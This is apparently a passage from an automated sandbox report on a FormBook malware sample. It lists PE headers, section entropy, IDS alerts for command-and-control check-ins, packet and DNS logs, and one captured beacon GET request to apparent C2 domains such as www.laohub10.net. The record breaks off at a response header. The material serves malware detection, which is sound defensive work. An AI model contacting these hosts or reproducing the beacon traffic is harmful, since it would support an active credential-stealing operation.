                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xcbd400x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xcc0000x1c3c.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xce0000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000xc9d980xc9e005d858db0d347b96f86432812f02d7381False0.8861672794117647data7.725344675276943IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0xcc0000x1c3c0x1e002fa306b0cb2010af4522963ffb0dbffcFalse0.80546875data7.0658536287420395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xce0000xc0x20019a4c461ef60068edccf51b06e2252cbFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0xcc1000x164fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.951672211521625
                                                  RT_GROUP_ICON0xcd7600x14data1.05
                                                  RT_VERSION0xcd7840x2b8COM executable for DOS0.44971264367816094
                                                  RT_MANIFEST0xcda4c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-12-14T13:50:26.831562+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84971527.124.4.24680TCP
                                                  2024-12-14T13:50:45.112946+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849743156.232.181.15580TCP
                                                  2024-12-14T13:50:47.769352+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849749156.232.181.15580TCP
                                                  2024-12-14T13:50:50.425470+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849755156.232.181.15580TCP
                                                  2024-12-14T13:50:53.267883+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849761156.232.181.15580TCP
                                                  2024-12-14T13:51:00.169850+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849777185.27.134.20680TCP
                                                  2024-12-14T13:51:02.982857+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849785185.27.134.20680TCP
                                                  2024-12-14T13:51:05.643181+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849794185.27.134.20680TCP
                                                  2024-12-14T13:51:08.315517+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849800185.27.134.20680TCP
                                                  2024-12-14T13:51:15.940564+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84981588.99.61.5280TCP
                                                  2024-12-14T13:51:18.496919+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84982188.99.61.5280TCP
                                                  2024-12-14T13:51:21.155464+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84982988.99.61.5280TCP
                                                  2024-12-14T13:51:23.825390+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84983688.99.61.5280TCP
                                                  2024-12-14T13:51:30.429742+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849854104.21.90.13780TCP
                                                  2024-12-14T13:51:33.099346+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849860104.21.90.13780TCP
                                                  2024-12-14T13:51:35.775082+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849866104.21.90.13780TCP
                                                  2024-12-14T13:51:39.039809+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849877104.21.90.13780TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 14, 2024 13:50:25.310548067 CET4971580192.168.2.827.124.4.246
                                                  Dec 14, 2024 13:50:25.431241989 CET804971527.124.4.246192.168.2.8
                                                  Dec 14, 2024 13:50:25.431349993 CET4971580192.168.2.827.124.4.246
                                                  Dec 14, 2024 13:50:25.442675114 CET4971580192.168.2.827.124.4.246
                                                  Dec 14, 2024 13:50:25.562776089 CET804971527.124.4.246192.168.2.8
                                                  Dec 14, 2024 13:50:26.787653923 CET804971527.124.4.246192.168.2.8
                                                  Dec 14, 2024 13:50:26.831562042 CET4971580192.168.2.827.124.4.246
                                                  Dec 14, 2024 13:50:26.979624033 CET804971527.124.4.246192.168.2.8
                                                  Dec 14, 2024 13:50:26.979727983 CET4971580192.168.2.827.124.4.246
                                                  Dec 14, 2024 13:50:26.982897997 CET4971580192.168.2.827.124.4.246
                                                  Dec 14, 2024 13:50:27.102679968 CET804971527.124.4.246192.168.2.8
                                                  Dec 14, 2024 13:50:43.475744963 CET4974380192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:43.596249104 CET8049743156.232.181.155192.168.2.8
                                                  Dec 14, 2024 13:50:43.596414089 CET4974380192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:43.610299110 CET4974380192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:43.730200052 CET8049743156.232.181.155192.168.2.8
                                                  Dec 14, 2024 13:50:45.112946033 CET4974380192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:45.233313084 CET8049743156.232.181.155192.168.2.8
                                                  Dec 14, 2024 13:50:45.233391047 CET4974380192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:46.131850004 CET4974980192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:46.251591921 CET8049749156.232.181.155192.168.2.8
                                                  Dec 14, 2024 13:50:46.251688957 CET4974980192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:46.267218113 CET4974980192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:46.386986017 CET8049749156.232.181.155192.168.2.8
                                                  Dec 14, 2024 13:50:47.769351959 CET4974980192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:47.889523029 CET8049749156.232.181.155192.168.2.8
                                                  Dec 14, 2024 13:50:47.889626026 CET4974980192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:48.787825108 CET4975580192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:48.907645941 CET8049755156.232.181.155192.168.2.8
                                                  Dec 14, 2024 13:50:48.907799006 CET4975580192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:48.922327995 CET4975580192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:49.042130947 CET8049755156.232.181.155192.168.2.8
                                                  Dec 14, 2024 13:50:49.042172909 CET8049755156.232.181.155192.168.2.8
                                                  Dec 14, 2024 13:50:50.425470114 CET4975580192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:50.546577930 CET8049755156.232.181.155192.168.2.8
                                                  Dec 14, 2024 13:50:50.546643019 CET4975580192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:51.444854021 CET4976180192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:51.565881014 CET8049761156.232.181.155192.168.2.8
                                                  Dec 14, 2024 13:50:51.566039085 CET4976180192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:51.575658083 CET4976180192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:51.881213903 CET8049761156.232.181.155192.168.2.8
                                                  Dec 14, 2024 13:50:53.265980005 CET8049761156.232.181.155192.168.2.8
                                                  Dec 14, 2024 13:50:53.266170979 CET8049761156.232.181.155192.168.2.8
                                                  Dec 14, 2024 13:50:53.267883062 CET4976180192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:53.268954039 CET4976180192.168.2.8156.232.181.155
                                                  Dec 14, 2024 13:50:53.389709949 CET8049761156.232.181.155192.168.2.8
                                                  Dec 14, 2024 13:50:58.785538912 CET4977780192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:50:58.907830954 CET8049777185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:50:58.908061028 CET4977780192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:50:58.923146009 CET4977780192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:50:59.043555021 CET8049777185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:51:00.169723034 CET8049777185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:51:00.169795036 CET8049777185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:51:00.169850111 CET4977780192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:51:00.425479889 CET4977780192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:51:01.445554972 CET4978580192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:51:01.730911970 CET8049785185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:51:01.731003046 CET4978580192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:51:01.750704050 CET4978580192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:51:01.870500088 CET8049785185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:51:02.982692957 CET8049785185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:51:02.982774973 CET8049785185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:51:02.982856989 CET4978580192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:51:03.253664970 CET4978580192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:51:04.273412943 CET4979480192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:51:04.393270969 CET8049794185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:51:04.393368959 CET4979480192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:51:04.411801100 CET4979480192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:51:04.533077002 CET8049794185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:51:04.533123016 CET8049794185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:51:05.643049955 CET8049794185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:51:05.643129110 CET8049794185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:51:05.643181086 CET4979480192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:51:05.925507069 CET4979480192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:51:06.177414894 CET8049794185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:51:06.177505016 CET4979480192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:51:06.944417953 CET4980080192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:51:07.064320087 CET8049800185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:51:07.064452887 CET4980080192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:51:07.082458973 CET4980080192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:51:07.202305079 CET8049800185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:51:08.315129995 CET8049800185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:51:08.315198898 CET8049800185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:51:08.315516949 CET4980080192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:51:08.318294048 CET4980080192.168.2.8185.27.134.206
                                                  Dec 14, 2024 13:51:08.442359924 CET8049800185.27.134.206192.168.2.8
                                                  Dec 14, 2024 13:51:14.444092035 CET4981580192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:14.565093994 CET804981588.99.61.52192.168.2.8
                                                  Dec 14, 2024 13:51:14.565237045 CET4981580192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:14.579996109 CET4981580192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:14.783737898 CET804981588.99.61.52192.168.2.8
                                                  Dec 14, 2024 13:51:15.940464973 CET804981588.99.61.52192.168.2.8
                                                  Dec 14, 2024 13:51:15.940488100 CET804981588.99.61.52192.168.2.8
                                                  Dec 14, 2024 13:51:15.940563917 CET4981580192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:16.081736088 CET4981580192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:17.100298882 CET4982180192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:17.220108032 CET804982188.99.61.52192.168.2.8
                                                  Dec 14, 2024 13:51:17.220352888 CET4982180192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:17.235116959 CET4982180192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:17.354919910 CET804982188.99.61.52192.168.2.8
                                                  Dec 14, 2024 13:51:18.496782064 CET804982188.99.61.52192.168.2.8
                                                  Dec 14, 2024 13:51:18.496831894 CET804982188.99.61.52192.168.2.8
                                                  Dec 14, 2024 13:51:18.496918917 CET4982180192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:18.737946033 CET4982180192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:19.757158041 CET4982980192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:19.877676964 CET804982988.99.61.52192.168.2.8
                                                  Dec 14, 2024 13:51:19.877763033 CET4982980192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:19.898612976 CET4982980192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:20.019504070 CET804982988.99.61.52192.168.2.8
                                                  Dec 14, 2024 13:51:20.019594908 CET804982988.99.61.52192.168.2.8
                                                  Dec 14, 2024 13:51:21.155148029 CET804982988.99.61.52192.168.2.8
                                                  Dec 14, 2024 13:51:21.155410051 CET804982988.99.61.52192.168.2.8
                                                  Dec 14, 2024 13:51:21.155463934 CET4982980192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:21.409799099 CET4982980192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:22.428582907 CET4983680192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:22.548466921 CET804983688.99.61.52192.168.2.8
                                                  Dec 14, 2024 13:51:22.548561096 CET4983680192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:22.558510065 CET4983680192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:22.680435896 CET804983688.99.61.52192.168.2.8
                                                  Dec 14, 2024 13:51:23.825227022 CET804983688.99.61.52192.168.2.8
                                                  Dec 14, 2024 13:51:23.825344086 CET804983688.99.61.52192.168.2.8
                                                  Dec 14, 2024 13:51:23.825390100 CET4983680192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:23.828664064 CET4983680192.168.2.888.99.61.52
                                                  Dec 14, 2024 13:51:23.948853016 CET804983688.99.61.52192.168.2.8
                                                  Dec 14, 2024 13:51:29.152894974 CET4985480192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:29.273885965 CET8049854104.21.90.137192.168.2.8
                                                  Dec 14, 2024 13:51:29.274049044 CET4985480192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:29.295617104 CET4985480192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:29.417330980 CET8049854104.21.90.137192.168.2.8
                                                  Dec 14, 2024 13:51:30.429028034 CET8049854104.21.90.137192.168.2.8
                                                  Dec 14, 2024 13:51:30.429501057 CET8049854104.21.90.137192.168.2.8
                                                  Dec 14, 2024 13:51:30.429742098 CET4985480192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:30.800524950 CET4985480192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:31.819638968 CET4986080192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:31.940537930 CET8049860104.21.90.137192.168.2.8
                                                  Dec 14, 2024 13:51:31.940622091 CET4986080192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:31.956368923 CET4986080192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:32.076359034 CET8049860104.21.90.137192.168.2.8
                                                  Dec 14, 2024 13:51:33.099092960 CET8049860104.21.90.137192.168.2.8
                                                  Dec 14, 2024 13:51:33.099277020 CET8049860104.21.90.137192.168.2.8
                                                  Dec 14, 2024 13:51:33.099345922 CET4986080192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:33.472369909 CET4986080192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:34.491153955 CET4986680192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:34.612752914 CET8049866104.21.90.137192.168.2.8
                                                  Dec 14, 2024 13:51:34.612874985 CET4986680192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:34.628195047 CET4986680192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:34.748119116 CET8049866104.21.90.137192.168.2.8
                                                  Dec 14, 2024 13:51:34.748142958 CET8049866104.21.90.137192.168.2.8
                                                  Dec 14, 2024 13:51:35.774682999 CET8049866104.21.90.137192.168.2.8
                                                  Dec 14, 2024 13:51:35.774991035 CET8049866104.21.90.137192.168.2.8
                                                  Dec 14, 2024 13:51:35.775082111 CET4986680192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:36.753801107 CET4986680192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:37.774235964 CET4987780192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:37.894521952 CET8049877104.21.90.137192.168.2.8
                                                  Dec 14, 2024 13:51:37.894653082 CET4987780192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:37.903799057 CET4987780192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:38.023652077 CET8049877104.21.90.137192.168.2.8
                                                  Dec 14, 2024 13:51:39.037941933 CET8049877104.21.90.137192.168.2.8
                                                  Dec 14, 2024 13:51:39.038455963 CET8049877104.21.90.137192.168.2.8
                                                  Dec 14, 2024 13:51:39.039808989 CET4987780192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:39.041357994 CET4987780192.168.2.8104.21.90.137
                                                  Dec 14, 2024 13:51:39.161206007 CET8049877104.21.90.137192.168.2.8

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 14, 2024 13:50:24.593214035 CET5976853192.168.2.81.1.1.1
                                                  Dec 14, 2024 13:50:25.303422928 CET53597681.1.1.1192.168.2.8
                                                  Dec 14, 2024 13:50:42.023149014 CET5984753192.168.2.81.1.1.1
                                                  Dec 14, 2024 13:50:43.034857988 CET5984753192.168.2.81.1.1.1
                                                  Dec 14, 2024 13:50:43.460613966 CET53598471.1.1.1192.168.2.8
                                                  Dec 14, 2024 13:50:43.460628986 CET53598471.1.1.1192.168.2.8
                                                  Dec 14, 2024 13:50:58.288575888 CET5103153192.168.2.81.1.1.1
                                                  Dec 14, 2024 13:50:58.782696962 CET53510311.1.1.1192.168.2.8
                                                  Dec 14, 2024 13:51:13.335892916 CET6328353192.168.2.81.1.1.1
                                                  Dec 14, 2024 13:51:14.331752062 CET6328353192.168.2.81.1.1.1
                                                  Dec 14, 2024 13:51:14.441052914 CET53632831.1.1.1192.168.2.8
                                                  Dec 14, 2024 13:51:14.470036983 CET53632831.1.1.1192.168.2.8
                                                  Dec 14, 2024 13:51:28.837759972 CET5485053192.168.2.81.1.1.1
                                                  Dec 14, 2024 13:51:29.150162935 CET53548501.1.1.1192.168.2.8

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 14, 2024 13:50:24.593214035 CET192.168.2.81.1.1.10x7c87Standard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                  Dec 14, 2024 13:50:42.023149014 CET192.168.2.81.1.1.10x81ceStandard query (0)www.5tuohbpzyj9.buzzA (IP address)IN (0x0001)false
                                                  Dec 14, 2024 13:50:43.034857988 CET192.168.2.81.1.1.10x81ceStandard query (0)www.5tuohbpzyj9.buzzA (IP address)IN (0x0001)false
                                                  Dec 14, 2024 13:50:58.288575888 CET192.168.2.81.1.1.10xa1cbStandard query (0)www.canadavinreport.siteA (IP address)IN (0x0001)false
                                                  Dec 14, 2024 13:51:13.335892916 CET192.168.2.81.1.1.10xf9dbStandard query (0)www.phoenix88.sbsA (IP address)IN (0x0001)false
                                                  Dec 14, 2024 13:51:14.331752062 CET192.168.2.81.1.1.10xf9dbStandard query (0)www.phoenix88.sbsA (IP address)IN (0x0001)false
                                                  Dec 14, 2024 13:51:28.837759972 CET192.168.2.81.1.1.10x55b8Standard query (0)www.ana-silverco.shopA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 14, 2024 13:50:25.303422928 CET1.1.1.1192.168.2.80x7c87No error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                  Dec 14, 2024 13:50:25.303422928 CET1.1.1.1192.168.2.80x7c87No error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                  Dec 14, 2024 13:50:25.303422928 CET1.1.1.1192.168.2.80x7c87No error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                  Dec 14, 2024 13:50:25.303422928 CET1.1.1.1192.168.2.80x7c87No error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                  Dec 14, 2024 13:50:25.303422928 CET1.1.1.1192.168.2.80x7c87No error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                  Dec 14, 2024 13:50:43.460613966 CET1.1.1.1192.168.2.80x81ceNo error (0)www.5tuohbpzyj9.buzz156.232.181.155A (IP address)IN (0x0001)false
                                                  Dec 14, 2024 13:50:43.460628986 CET1.1.1.1192.168.2.80x81ceNo error (0)www.5tuohbpzyj9.buzz156.232.181.155A (IP address)IN (0x0001)false
                                                  Dec 14, 2024 13:50:58.782696962 CET1.1.1.1192.168.2.80xa1cbNo error (0)www.canadavinreport.site185.27.134.206A (IP address)IN (0x0001)false
                                                  Dec 14, 2024 13:51:14.441052914 CET1.1.1.1192.168.2.80xf9dbNo error (0)www.phoenix88.sbsphoenix88.sbsCNAME (Canonical name)IN (0x0001)false
                                                  Dec 14, 2024 13:51:14.441052914 CET1.1.1.1192.168.2.80xf9dbNo error (0)phoenix88.sbs88.99.61.52A (IP address)IN (0x0001)false
                                                  Dec 14, 2024 13:51:14.470036983 CET1.1.1.1192.168.2.80xf9dbNo error (0)www.phoenix88.sbsphoenix88.sbsCNAME (Canonical name)IN (0x0001)false
                                                  Dec 14, 2024 13:51:14.470036983 CET1.1.1.1192.168.2.80xf9dbNo error (0)phoenix88.sbs88.99.61.52A (IP address)IN (0x0001)false
                                                  Dec 14, 2024 13:51:29.150162935 CET1.1.1.1192.168.2.80x55b8No error (0)www.ana-silverco.shop104.21.90.137A (IP address)IN (0x0001)false
                                                  Dec 14, 2024 13:51:29.150162935 CET1.1.1.1192.168.2.80x55b8No error (0)www.ana-silverco.shop172.67.156.195A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • www.laohub10.net
                                                  • www.5tuohbpzyj9.buzz
                                                  • www.canadavinreport.site
                                                  • www.phoenix88.sbs
                                                  • www.ana-silverco.shop

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.84971527.124.4.246802648C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 14, 2024 13:50:25.442675114 CET524OUTGET /8s5b/?KX=CIoU3XkQQhyfpcUgpw2pt4D5rFaewhtqHE31gFJTqo9NSkmYuUT5vLSdoQQ8/MieV/ko0R3BDKl76A9J0JdcYqRwUDZc0hQ5nlduAuRdjiHqVHSyH0yZGbg1OgG3wMBkWQ==&2VqtG=K0rLevU0Wh5tIJEp HTTP/1.1
                                                  Host: www.laohub10.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.5
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Dec 14, 2024 13:50:26.787653923 CET525INHTTP/1.1 200 OK
                                                  Server: Apache
                                                  Content-Type: text/html; charset=utf-8
                                                  Accept-Ranges: bytes
                                                  Cache-Control: max-age=86400
                                                  Age: 1
                                                  Connection: Close
                                                  Content-Length: 350
